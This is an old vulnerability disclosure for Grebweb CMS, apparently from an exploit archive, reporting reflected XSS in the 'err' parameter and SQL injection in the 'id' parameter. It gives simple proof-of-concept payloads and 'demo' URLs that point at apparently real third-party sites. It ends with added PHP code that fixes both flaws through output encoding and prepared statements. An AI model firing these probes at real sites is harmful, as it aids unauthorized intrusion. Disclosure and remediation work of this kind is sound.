Grebweb Cms <= Multiple Disclosure Vulnerabilities

2011.12.31
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79, CWE-89

----------------------------------------------------------------
Grebweb Cms <= Multiple Disclosure Vulnerabilities
----------------------------------------------------------------

# Exploit Title: Grebweb Cms <= Multiple Disclosure Vulnerabilities
# Application Name: [Grebweb Cms]
# Date: 30/12/2011
# Author: BHG Security Center
# Home: Http://black-hg.org
# Software Link: [ http://www.grebweb.com/ ]
# Impact : [ High ]
# Tested on: [linux+apache]
# CVE : Webapps
# Finder(s):
    - Net.Edit0r (Net.edit0r [at] att [dot] net)

# Description:
  : Given the vulnerability you want to read files on the server must have access

+-----------------------+
| Cross Site scripting  |
+-----------------------+

The vulnerable code is located in /admin/index.php?err=[XSS]

Proof of Concept:
-----------------

~ PoC : http://localhost/admin/index.php?err=[XSS]
~ Demo : http://202.71.128.172/NIHFW/admin/index.php?err="><script>alert(0)</script>

~ PoC 2 Enter In Search Box XSS Code
~ <FORM NAME="searchzoom" ACTION="index.php" TARGET=_top METHOD="post">
~ PoC : http://localhost/index.php
~ Demo : http://www.yagyashree.com/index.php

+-------------------+
| Sql Injection     |
+-------------------+

~ Poc 2 Enter In Search Box XSS Code
~ <FORM NAME="searchzoom" ACTION="index.php" TARGET=_top METHOD="post">
~ PoC : http://localhost/index.php

~ PoC : http://localhost/NIHFW/view-state.php?id=[Sqli]
~ Demo : http://202.71.128.172/NIHFW/view-state.php?id='

[-] Disclosure timeline:

[21/12/2011] - Vulnerabilities discovered
[24/12/2011] - Others vulnerabilities discovered
[27/12/2011] - Issues reported to http://black-hg.org
[30/12/2011] - Public disclosure

# Greets To : Net.Edit0r ~ A.Cr0x ~ 3H34N ~ 4m!n ~ tHe.k!ll3r ~ Mr.XHat ~ Bl4ck.Viper
  b3hz4d ~ G3n3Rall ~ NoL1m1t ~ __SENATOR__ ~ NetQurd ~ Cyber C0der

THANKS TO ALL Iranian HackerZ ./Persian Gulf

===========================================[End]=============================================

References:

http://black-hg.org
http://www.yagyashree.com/index.php
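
Mitigation sketch for the two parameters named in the advisory (`err` in /admin/index.php and `id` in view-state.php). This is an added example, not code from Grebweb CMS or from the advisory's author; the function names, the `states` table and its columns are hypothetical, and the sample rows and inputs are constructed.

```php
<?php
// Added example: hardened handling of the two parameters named in the advisory.
// The `states` table, its columns and both function names are hypothetical.

// Reflected XSS fix: encode `err` for the HTML context it is echoed into.
function render_error_banner(?string $err): string
{
    if ($err === null || $err === '') {
        return '';
    }
    // ENT_QUOTES also encodes single and double quotes, so the value
    // cannot close an attribute or open a new tag.
    $safe = htmlspecialchars($err, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<div class="error">' . $safe . '</div>';
}

// SQL injection fix: validate `id` as a positive integer, then bind it.
function fetch_state(PDO $db, ?string $rawId): ?array
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null; // reject instead of passing the raw value to the database
    }
    $stmt = $db->prepare('SELECT id, name FROM states WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed data so the example runs offline (requires the pdo_sqlite extension).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE states (id INTEGER PRIMARY KEY, name TEXT)');
$db->exec("INSERT INTO states (id, name) VALUES (1, 'Sample State')");

// Constructed inputs shaped like the advisory's PoC values.
echo render_error_banner('"><script>alert(0)</script>'), PHP_EOL;
var_dump(fetch_state($db, '1')); // a well-formed id
var_dump(fetch_state($db, "'")); // the single-quote probe from the advisory
```

Where `err` only ever carries a fixed set of messages, mapping a short error code to server-side text is stricter than echoing the encoded parameter.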

